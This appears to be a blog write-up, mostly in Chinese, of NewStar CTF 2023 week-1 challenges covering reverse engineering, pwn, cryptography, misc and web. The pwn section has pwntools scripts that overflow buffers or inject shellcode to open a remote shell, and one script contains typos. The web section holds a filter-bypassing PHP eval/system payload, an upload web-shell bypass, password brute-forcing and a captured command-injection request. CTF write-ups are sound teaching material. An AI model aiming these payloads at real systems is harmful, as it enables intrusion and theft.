nyyyddddn

newstar2023_week1

ctf writeup
2023/12/28

RE

easy_RE

确实是打开就有

1
flag{we1c0me_to_rev3rse!!}

elf

inputString 先异或然后+16 然后base64encode后和flag cmp,decode后-16 异或就好了

1
2
3
4
s1 = (char *)base64_encode(v6, v3);
  if ( !strcmp(s1, "VlxRV2t0II8kX2WPJ15fZ49nWFEnj3V8do8hYy9t") )
  
 ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
_BYTE *__fastcall encode(const char *a1)
{
  size_t v1; // rax
  int v2; // eax
  _BYTE *v4; // [rsp+20h] [rbp-20h]
  int i; // [rsp+28h] [rbp-18h]
  int v6; // [rsp+2Ch] [rbp-14h]

  v1 = strlen(a1);
  v4 = malloc(2 * v1 + 1);
  v6 = 0;
  for ( i = 0; i < strlen(a1); ++i )
  {
    v2 = v6++;
    v4[v2] = (a1[i] ^ 0x20) + 16;
  }
  v4[v6] = 0;
  return v4;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import base64

def custom_base64_decode(encoded_str):
    custom_base64_chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    standard_base64_chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    translation = str.maketrans(custom_base64_chars, standard_base64_chars)
    return base64.b64decode(encoded_str.translate(translation))

def xor(encoded_bytes):
    decoded_chars = []
    for byte in encoded_bytes:
        char = chr((byte - 16) ^ 0x20)
        decoded_chars.append(char)
    return ''.join(decoded_chars)


encoded_str = "VlxRV2t0II8kX2WPJ15fZ49nWFEnj3V8do8hYy9t"
print(xor(custom_base64_decode(encoded_str)))
1
flag{D0_4ou_7now_wha7_ELF_1s?}

die查壳是upx4.0.2 , 在这里下载https://github.com/upx/upx/releases

然后upx -d filename 脱壳

1
2
3
4
5
6
7
8
for ( i = 0i64; ; ++i )
{
  v4 = &Str1[strlen(Str1)];
  if ( i >= v4 - Str1 )
    break;
  ++Str1[i];
}
if ( !strncmp(Str1, enc, v4 - Str1) )

gmbh|D1ohsbuv2bu21ot1oQb332ohUifG2stuQ[HBMBYZ2fwf2~

大概是吧str1全部++了一边 –回去就好了

1
2
3
4
5
flag = "gmbh|D1ohsbuv2bu21ot1oQb332ohUifG2stuQ[HBMBYZ2fwf2~"
flag = [c for c in flag]
for i in range(len(flag)):
    flag[i] = chr(ord(flag[i]) - 1)
    print(flag[i] , end="")
1
flag{C0ngratu1at10ns0nPa221ngTheF1rstPZGALAXY1eve1}

Segments

shift_f7 打开段视图,然后拼接flag

1
flag{You_ar3_g0od_at_f1nding_ELF_segments_name}

AndroXor

关键逻辑在这里,能看到长度,还有异或的操作,只需要根据happyx3 还有 cArr置反就能得到inputString

1
2
3
4
5
6
7
8
9
10
11
12
13
public String Xor(String str, String str2) {
        char[] cArr = {14, '\r', 17, 23, 2, 'K', 'I', '7', ' ', 30, 20, 'I', '\n', 2, '\f', '>', '(', '@', 11, '\'', 'K', 'Y', 25, 'A', '\r'};
        char[] cArr2 = new char[str.length()];
        String str3 = str.length() != 25 ? "wrong!!!" : "you win!!!";
        for (int i = 0; i < str.length(); i++) {
            char charAt = (char) (str.charAt(i) ^ str2.charAt(i % str2.length()));
            cArr2[i] = charAt;
            if (cArr[i] != charAt) {
                return "wrong!!!";
            }
        }
        return str3;
    }
1
Toast.makeText(mainActivity, mainActivity.Xor(obj, "happyx3"), 1).show();
1
2
3
4
5
str2 = "happyx3"
cArr = [14, '\r', 17, 23, 2, 'K', 'I', '7', ' ', 30, 20, 'I', '\n', 2, '\f', '>', '(', '@', 11, '\'', 'K', 'Y', 25, 'A', '\r']

str1 = ''.join([chr(cArr[i] ^ ord(str2[i % len(str2)])) if isinstance(cArr[i], int) else chr(ord(cArr[i]) ^ ord(str2[i % len(str2)])) for i in range(len(cArr))])
print(str1)
1
flag{3z_And0r1d_X0r_x1x1}

Endian

这里v5是个指针来的,一开始看有些怪,过一会就懂了。需要再异或一次,然后按字节拆分数字,小端序转大端序就好了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int i; // [rsp+4h] [rbp-3Ch]
  char *v5; // [rsp+8h] [rbp-38h]
  char v6[40]; // [rsp+10h] [rbp-30h] BYREF
  unsigned __int64 v7; // [rsp+38h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  puts("please input your flag");
  __isoc99_scanf("%s", v6);
  v5 = v6;
  for ( i = 0; i <= 4; ++i )
  {
    if ( *(_DWORD *)v5 != (array[i] ^ 0x12345678) )
    {
      printf("wrong!");
      exit(0);
    }
    v5 += 4;
  }
  printf("you are right");
  return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
def process_and_combine(hex_values):
    
    xor_results = [hex(int(value, 16) ^ 0x12345678) for value in hex_values]

    reversed_strings = []
    for xor_result in xor_results:
        xor_result = xor_result[2:].rjust(8, '0')
        result_string = "".join([chr(int(xor_result[i:i + 2], 16)) for i in range(0, 8, 2)])
        reversed_strings.append(result_string[::-1])

    combined_string = "".join(reversed_strings)

   	return combined_string


flag = ["75553A1E", "7B583A03", "4D58220C", "7B50383D", "736B3819"]
inputString = process_and_combine(flag)

print(inputString)
1
flag{llittl_Endian_a}

EzPE

修复pe头的话,找个exe 010edit从开始到0x70h那一行粘贴一下,就好了

异或置反一下就好了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
data = [
    0x0A, 0x0C, 0x04, 0x1F, 0x26, 0x6C, 0x43, 0x2D, 0x3C, 0x0C, 
    0x54, 0x4C, 0x24, 0x25, 0x11, 0x06, 0x05, 0x3A, 0x7C, 0x51, 
    0x38, 0x1A, 0x03, 0x0D, 0x01, 0x36, 0x1F, 0x12, 0x26, 0x04, 
    0x68, 0x5D, 0x3F, 0x2D, 0x37, 0x2A, 0x7D
]

input_recovered = [0] * len(data)
input_recovered[-1] = data[-1]

for i in range(len(data) - 2, -1, -1):
    input_recovered[i] = data[i] ^ (i ^ input_recovered[i + 1])

for i in input_recovered:
    print(chr(i),end="")
1
flag{Y0u_kn0w_what_1s_PE_File_F0rmat}

lazy_activtiy

activtiy是提供用户界面,可以使用户交互的,程序中有个flag activtiy但是主界面没有什么地方能够调用这个activity的搜了一下可以用

1
am start -n com.droidlearn.activity_travel/com.droidlearn.activity_travel.FlagActivity

这个命令adb shell的命令来调用一个应用的activtiy

这边是flag activity的关键逻辑,可以反编译然后将10000改成1就好了。但是折腾了好久apktools反编译打包有问题,还有签名那,后面找了一个安卓修改大师破解版,一键打包签名就正常了

1
2
3
4
5
6
7
public void onClick(View view) {
                textView.setText(Integer.toString(FlagActivity.access$004(FlagActivity.this)));
                if (FlagActivity.this.cnt >= 10000) {
                    Toast.makeText(FlagActivity.this, editText.getText().toString(), 0).show();
                }
            }

1
flag{Act1v1ty_!s_so00oo0o_Impor#an#}

pwn

ret2text

有个backdoor函数,溢出后跳过去就好了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from pwn import *
from LibcSearcher import *

elf = context.binary = ELF('./ret2text')
#
ip = "node4.buuoj.cn"
port = 29750

# p = process()
p = remote(ip,port)


line = p.recvline(); print(line) # Welcome to NewStar CTF!!
line = p.recvline(); print(line) # Show me your magic


backdoor_address = 0x4011FB
payload = b'a' * (32 + 8)
paylaod += backdoor_adress


p.sendline(payload)

p.interactive()

ezshellcode

shellcode输入后会直接jmp到buf那,所以只需要把shellcode输入就好了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from pwn import *
from LibcSearcher import *

elf = context.binary = ELF('./ezshellcode')
#
ip = "node4.buuoj.cn"
port = 29750

# p = process()
p = remote(ip,port)

context(arch='amd64', os='linux')


line = p.recvline(); print(line) # Welcome to NewStar CTF!!
line = p.recvline(); print(line) # Show me your magic


shellcode  =  asm(shellcraft.sh())

payload = shellcode


p.sendline(payload)

p.interactive()

newstar shop

选1进商店买到没钱然后选3 -50后,uint溢出就能直接买/bin sh了

1
flag{8b42af7c-c695-489a-ad79-1bff9d84f52c}

p1eee

咱是笨蛋,习惯性看ida中的函数视图了,没注意到关键函数下面有个用_asm{}写的直接system bin sh的块,pie的话低三位16进制的地址是不变的,所以只需要在return位置那填充低位地址,根据原有的高位地址,就能跳过去。

1
2
3
4
5
6
7
8
9
10
.text:0000000000001264 ; __unwind {
.text:0000000000001264                 endbr64
.text:0000000000001268                 push    rbp
.text:0000000000001269                 mov     rbp, rsp
.text:000000000000126C                 lea     rdi, aBinSh     ; "/bin/sh"
.text:0000000000001273                 call    _system
.text:0000000000001278                 nop
.text:0000000000001279                 pop     rbp
.text:000000000000127A                 retn
.text:000000000000127A ; } // starts at 1264
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from pwn import *

elf = context.binary = ELF('./p1eee')
ip = "node4.buuoj.cn"
port = 26886

context.log_level = 'debug'
# p = process()
p = remote(ip,port)

line = p.recvline(); print(line)

payload = b'a' * (32 + 8) + p8(0x6C)

p.sendline(payload)
p.interactive()  
1
flag{cc6d8d8e-cae4-4f5d-88b5-8ddd66f66a2c}

Random

可以用ctypes 调用libc中的time srand rand函数,校园网好卡,去外边才打通了,要多跑几遍,随机数拼凑字符对了才可以

https://blog.csdn.net/qq_29912475/article/details/130319284 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
from pwn import *
import ctypes

elf = context.binary = ELF('./Random')
context.log_level = 'debug'
libc = ctypes.CDLL("libc.so.6")

ip = "node4.buuoj.cn"
port = 25248
p = remote(ip,port)

# p = process()

#初始化函数返回值
libc.time.restype = ctypes.c_long
libc.srand.argtypes = [ctypes.c_uint]

#调用函数
time_value = ctypes.c_longlong(0)
seed = libc.time(ctypes.byref(time_value))
libc.srand(seed)
rand_result = libc.rand()

line = p.recvline(); print(line)
p.sendline(str(rand_result))

p.interactive()
1
flag{f5be13ec-f7f0-4dea-ab64-31470e102fbf}

Crypto

brainfuck

可以用这个解密 https://ctf.bugku.com/tool/brainfuck

1
flag{Oiiaioooooiai#b7c0b1866fe58e12}

Caesar’s Secert

想到偏移量,凯撒密码,https://ctf.bugku.com/tool/caesar 偏移5解出flag

1
flag{ca3s4r's_c1pher_i5_v4ry_3azy}

Fence

栅栏密码 https://www.qqxiuzi.cn/bianma/zhalanmima.php 解密

1
flag{reordering_the_plaintext#686f8c03}

Vigenère

1
2
3
4
5
6
7
8
9
10
11
12
13
14
def vigenere_decrypt_single(char_ciphertext, char_plaintext):
    alphabet = "abcdefghijklmnopqrstuvwxyz"
    index_ciphertext = alphabet.index(char_ciphertext)
    index_plaintext = alphabet.index(char_plaintext)
    index_key = (index_ciphertext - index_plaintext) % 26
    return alphabet[index_key]

ciphertext = "pqcq"
plaintext = "flag"


key = "".join([vigenere_decrypt_single(ciphertext[i], plaintext[i]) for i in range(4)])
print(key)

跑出来是kfck, 猜测是kfckfc,用kfc解密后拿到flag

flag{la_c1fr4_del_5ign0r_giovan_batt1st4_b3ll5s0}

babyrsa

Q&A:

1选择N = p * q是因为N有能够唯一分解成p q两个因子的特性

2为什么φ(p) =(p-1)?

是因为p是素数这个特性,所以和p互质的数是p-1个

3 ed≡1(mod φ(N)) 这个是根据扩欧几里得推导出来的

扩欧几里得的定义是 能找到整数x ,y 使得ax + by = gcd(a,b)

e和d是互质的,所以使得 ex + φ(N)y = 1 然后φ(N)y = 0,所以就算出ed≡1(mod φ(N))

http://www.factordb.com/index.php 可以用这个在线的网站分解n,然后求phi n,通过phi n求e的逆元d解密

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
from Crypto.Util.number import long_to_bytes

# 计算phi n
def calculate_phi_n(factors):
    phi_n = 1
    for p in factors:
        phi_n *= (p - 1)
    return phi_n

# 求逆元
def modinv(a, m):
    g, x, y = extended_gcd(a, m)
    return x % m

def extended_gcd(a, b):
    if a == 0:
        return (b, 0, 1)
    else:
        g, y, x = extended_gcd(b % a, a)
        return (g, x - (b // a) * y, y)

def rsa_decrypt(c, n, e, factors):
    phi_n = calculate_phi_n(factors)
    d = modinv(e, phi_n)
    m = pow(c, d, n)
    return long_to_bytes(m).decode()

n = 17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261
e = 65537
c = 14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595
factors = [
    2217990919, 2338725373, 2370292207, 2463878387, 2706073949,
    2794985117, 2804303069, 2923072267, 2970591037, 3207148519,
    3654864131, 3831680819, 3939901243, 4093178561, 4278428893
]

decrypted_message = rsa_decrypt(c, n, e, factors)
print(decrypted_message)

babyencoding

part1 和part2有=号,然后part1是大小写字母加数字,2是纯大写字母,应该是base64和32.

part3搜了好久,在这篇文章中找到了https://blog.csdn.net/Retrovich/article/details/90313591 是uuencode编码,在线解密拼接得到flag

1
flag{dazzling_encoding#4e0ad4f0ca08d1e1d0f10c0c7afe422fea7c55192c992036ef623372601ff3a}

后面去看了一下群里的crypto入门的文档,发现里面就有uuencode的识别方法

Small d

Michael J. Wiener 觉得很赞 这个搜了一下,有一种针对small d的攻击方式叫维纳攻击

https://blog.csdn.net/rreally/article/details/111092579

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
import gmpy2

def transform(x, y):  # 使用辗转相处将分数 x/y 转为连分数的形式
    res = []
    while y:
        res.append(x // y)
        x, y = y, x % y
    return res

def continued_fraction(sub_res):
    numerator, denominator = 1, 0
    for i in sub_res[::-1]:  # 从sublist的后面往前循环
        denominator, numerator = numerator, i * numerator + denominator
    return denominator, numerator  # 得到渐进分数的分母和分子,并返回

# 求解每个渐进分数
def sub_fraction(x, y):
    res = transform(x, y)
    res = list(map(continued_fraction, (res[0:i] for i in range(1, len(res)))))  # 将连分数的结果逐一截取以求渐进分数
    return res

def get_pq(a, b, c):  # 由p+q和pq的值通过维达定理来求解p和q
    par = gmpy2.isqrt(b * b - 4 * a * c)  # 由上述可得,开根号一定是整数,因为有解
    x1, x2 = (-b + par) // (2 * a), (-b - par) // (2 * a)
    return x1, x2

def wienerAttack(e, n):
    for (d, k) in sub_fraction(e, n):  # 用一个for循环来注意试探e/n的连续函数的渐进分数,直到找到一个满足条件的渐进分数
        if k == 0:  # 可能会出现连分数的第一个为0的情况,排除
            continue
        if (e * d - 1) % k != 0:  # ed=1 (mod φ(n)) 因此如果找到了d的话,(ed-1)会整除φ(n),也就是存在k使得(e*d-1)//k=φ(n)
            continue

        phi = (e * d - 1) // k  # 这个结果就是 φ(n)
        px, qy = get_pq(1, n - phi + 1, n)
        if px * qy == n:
            p, q = abs(int(px)), abs(int(qy))  # 可能会得到两个负数,负负得正未尝不会出现
            d = gmpy2.invert(e, (p - 1) * (q - 1))  # 求ed=1 (mod  φ(n))的结果,也就是e关于 φ(n)的乘法逆元d
            return d
    print("该方法不适用")


e = 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
n = 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433
d = wienerAttack(e, n)
print("d=", d)

求出d后解密flag

1
2
3
4
5
6
7
8
9
from Crypto.Util.number import *

c = 6755916696778185952300108824880341673727005249517850628424982499865744864158808968764135637141068930913626093598728925195859592078242679206690525678584698906782028671968557701271591419982370839581872779561897896707128815668722609285484978303216863236997021197576337940204757331749701872808443246927772977500576853559531421931943600185923610329322219591977644573509755483679059951426686170296018798771243136530651597181988040668586240449099412301454312937065604961224359235038190145852108473520413909014198600434679037524165523422401364208450631557380207996597981309168360160658308982745545442756884931141501387954248
e = 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
n = 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433
d = 2357048593

flag = pow(c,d,n)
print(long_to_bytes(flag))

babyxor

flag按字节异或上f,需要爆破f,f的范围是一个字节0-255,把0-255按字节异或上c跑一遍就好了

1
2
3
4
5
6
7
8
c = "e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2"
c = bytes.fromhex(c)

flag = ""
for key in range(256):
    flag = bytes([b ^ key for b in c])
    if b"flag" in flag:
        print(flag)

Affine

仿射密码,这里要求解的问题是 置反(key[0]*f + key[1]) % modulus 这个操作

可以简化成m = (c -key[1]) * key[0]的模逆,用扩欧几里得来求模逆

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
from itertools import product

c = "dd4388ee428bdddd5865cc66aa5887ffcca966109c66edcca920667a88312064"
c = bytes.fromhex(c)

# 求模逆
def modinv(a, m):
    for i in range(1, m):
        if (a * i) % m == 1:
            return i
    return None

for k0, k1 in product(range(256), repeat=2):
    k0_inv = modinv(k0, 256)
    if k0_inv is None:
        continue

    decrypted = []
    for b in c:
        f = ((b - k1) * k0_inv) % 256
        decrypted.append(f)

    flag = str(bytes(decrypted))
    if "flag" in flag:
        print(flag)

babyaes

key是由两个相同的长度16字节的字符串组成,bytes_to_long(key) ^ bytes_to_long(iv) ^ 1这里只异或了key的16字节,所以可以算出key,然后用key的低位异或可以算出iv,用iv 和key 使用aes cbc mode就能解出flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from Crypto.Cipher import AES
from Crypto.Util.number import *

xor = 3657491768215750635844958060963805125333761387746954618540958489914964573229
flag = b'>]\xc1\xe5\x82/\x02\x7ft\xf1B\x8d\n\xc1\x95i'
xor = long_to_bytes(xor)
key = xor[:16]*2

iv = bytes_to_long(key[16:]) ^ bytes_to_long(xor[16:])
iv = long_to_bytes(iv)

aes = AES.new(key,AES.MODE_CBC,iv)
flag = aes.decrypt(flag)
print(flag)

Misc

CyberChef’s Secret

base32 -> base58 ->base64

1
flag{Base_15_S0_Easy_^_^}

机密图片

lsb隐写

1
flag{W3lc0m3_t0_N3wSt4RCTF_2023_7cda3ece}

流量!鲨鱼!

看了一下,很多无用http的数据包 用http.response.code == 200筛选后,找到这个

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
GET /1.php?cmd=base64%20/.ffffllllllll11111144444GGGGGG|base64 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5666.197 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Cookie: PHPSESSID=85usgbksv9rn85kdcsgu5j0903
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Google Chrome";v="113", "Chromium";v="113", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0

HTTP/1.1 200 OK
Date: Sat, 19 Aug 2023 06:20:45 GMT
Server: Apache/2.4.51 (Debian)
X-Powered-By: PHP/7.3.33
Vary: Accept-Encoding
Content-Encoding: gzip
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

Wm14aFozdFhjbWt6TldnMGNtdGZNWE5mZFRVelpuVnNYMkkzTW1FMk1EazFNemRsTm4wSwo=

然后base64解密两次,拿到flag

1
flag{Wri35h4rk_1s_u53ful_b72a609537e6}

压缩包们

https://www.cnblogs.com/Hardworking666/p/15866121.html

https://blog.csdn.net/q20010619/article/details/109425270

搜了一下,缺个zip头 https://blog.csdn.net/qq_29566629/article/details/122936177

加上50 4B 03 04后解压,发现结尾有一串base64编码,解密后提示密码是6位数的,

用ARCHPR破解有些问题,搜了一下装了一个Ziperello,破解后拿到flag

1
flag{y0u_ar3_the_m4ter_of_z1111ppp_606a4adc}

空白格

在这篇文章找到了解决方法

https://blog.csdn.net/qq_51999772/article/details/122418926

https://vii5ard.github.io/whitespace/

运行得到flag

1
flag{w3_h4v3_to0_m4ny_wh1t3_sp4ce_2a5b4e04}

隐秘的眼睛

silenteye 下载这个工具,然后解密拿到flag

https://www.sqlsec.com/2018/01/ctfwav.html#SilentEye

https://achorein.github.io/silenteye/

1
flag{R0ck1ng_y0u_63b0dc13a591}

web

泄漏的秘密

用dirmap 发现有个www.zip 和robot 拼接index中的flag和robots的flag后得到flag

1
flag{r0bots_1s_s0_us3ful_4nd_www.zip_1s_s0_d4ng3rous}

Begin of Upload

有段js的代码检测上传的类型,在firefox里面把js禁用后就能上传php文件了

用一句话木马加蚁剑在根目录下找到flag

1
flag{e9ed8544-e37e-4c4a-ac21-d7cacf157dbf}

Begin of HTTP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
POST /?ctf=1 HTTP/1.1
Host: node4.buuoj.cn:2866
User-Agent: NewStarCTF2023
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
Origin: newstarctf.com
DNT: 1
Connection: close
Referer: newstarctf.com
Cookie: power=ctfer
X-Real-IP: 127.0.0.1
Upgrade-Insecure-Requests: 1

secret=n3wst4rCTF2023g00000d
1
flag{5937a957-5910-4eec-91c3-84e1a8911d97}

ErrorFlask

https://www.freebuf.com/articles/network/247503.html

根据提示,用空参数的时候flask就报错了,就把flag泄露出来了

1
http://98e6da3a-09a5-40e7-bac4-776d4dd52435.node4.buuoj.cn:81/?number1=1&number2=
1
flag = "flag{Y0u_@re_3enset1ve_4bout_deb8g}"

报错的地方在这里,空参数的时候request.args.get会返回’’ 然后int转型就会报错

1
2
3
4
num1 = request.args.get("number1");
num2 = request.args.get("number2");

return "not ssti,flag in source code~"+str(int(num1)+int(num2))

Begin of PHP

level1用0e绕过 level2传数组过去 level3传数组过去,level4加一个url编码is_numberic就识别不出来了,level5传一个符号就好了

https://blog.csdn.net/qq_46145027/article/details/124514124

https://www.cnblogs.com/zhengna/p/12342124.html

https://www.cnblogs.com/Primzahl/p/6018158.html

1
2
3
http://34cb9ad6-2b68-4fd9-a2fc-9a6698c8b0c5.node4.buuoj.cn:81/?key1=QNKCDZO&key2=s878926199a&key4[]=1&key5=2024%20

post: key3[]=@&flag5[]=@
1
flag{3a48262b-ac99-4f09-85ed-9ac23cec050e}

R!C!E!

password爆破脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
import hashlib
import itertools
import string
import threading

TARGET_PREFIX = "c4d038"
MAX_LENGTH = 6
CHARSET = string.ascii_lowercase + string.digits
THREADS = 4

def generate_strings(length):
    return itertools.product(CHARSET, repeat=length)

def md5(s):
    return hashlib.md5(s.encode()).hexdigest()

def check_string(start, end):
    for s in itertools.islice(generate_strings(MAX_LENGTH), start, end):
        if md5(''.join(s)).startswith(TARGET_PREFIX):
            print(f"Found: {''.join(s)}")
            return ''.join(s)
    return None

def threaded_bruteforce():
    total_combinations = len(CHARSET) ** MAX_LENGTH
    step = total_combinations // THREADS

    threads = []
    for i in range(THREADS):
        start = i * step
        end = (i + 1) * step if i != THREADS - 1 else total_combinations
        t = threading.Thread(target=check_string, args=(start, end))
        threads.append(t)
        t.start()

    for t in threads:
        t.join()

if __name__ == "__main__":
    # threaded_bruteforce()
    print(md5("apofox"))

非法变量名的转换 https://www.cnblogs.com/meng-han/p/16804708.html

phpinfo发现可以用拼接函数的方式绕过 https://blog.csdn.net/LYJ20010728/article/details/117469219

1
password=apofox&e[v.a.l=(sy.(st).em)("ca"."t /fla"."g");

EasyLogin

注册个账户后登录时候有个302的包显示这个,这个是个假的

1
2
3
4
<!-- 恭喜你找到flag -->
<!-- flag 为下方链接中视频简介第7行开始至第10行的全部小写字母和数字 -->
<!-- https://b23.tv/BV1SD4y1J7uY -->
<!-- 庆祝一下吧! -->

后面尝试去爆破admin,用burp中的brute forcer然后套md5爆破,爆破出来的密码是000000,然后有个302的包里面有flag

1
flag{3e7dd426-5475-4789-9605-b1fac334af0f}

Author:nyyyddddn

Link:https://nyyyddddn.github.io/2023/12/28/newstar2023-week1/

Publish date:December 28th 2023, 8:04:37 pm

Update date:March 27th 2024, 5:46:08 pm

License:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. RE
    1. 1.1. easy_RE
    2. 1.2. elf
    3. 1.3.
    4. 1.4. Segments
    5. 1.5. AndroXor
    6. 1.6. Endian
    7. 1.7. EzPE
    8. 1.8. lazy_activtiy
  2. 2. pwn
    1. 2.1. ret2text
    2. 2.2. ezshellcode
    3. 2.3. newstar shop
    4. 2.4. p1eee
    5. 2.5. Random
  3. 3. Crypto
    1. 3.1. brainfuck
    2. 3.2. Caesar’s Secert
    3. 3.3. Fence
    4. 3.4. Vigenère
    5. 3.5. babyrsa
    6. 3.6. babyencoding
    7. 3.7. Small d
    8. 3.8. babyxor
    9. 3.9. Affine
    10. 3.10. babyaes
  4. 4. Misc
    1. 4.1. CyberChef’s Secret
    2. 4.2. 机密图片
    3. 4.3. 流量!鲨鱼!
    4. 4.4. 压缩包们
    5. 4.5. 空白格
    6. 4.6. 隐秘的眼睛
  5. 5. web
    1. 5.1. 泄漏的秘密
    2. 5.2. Begin of Upload
    3. 5.3. Begin of HTTP
    4. 5.4. ErrorFlask
    5. 5.5. Begin of PHP
    6. 5.6. R!C!E!
    7. 5.7. EasyLogin
Total : 59
2024
2023
Invalid date
2023
ctf writeup misc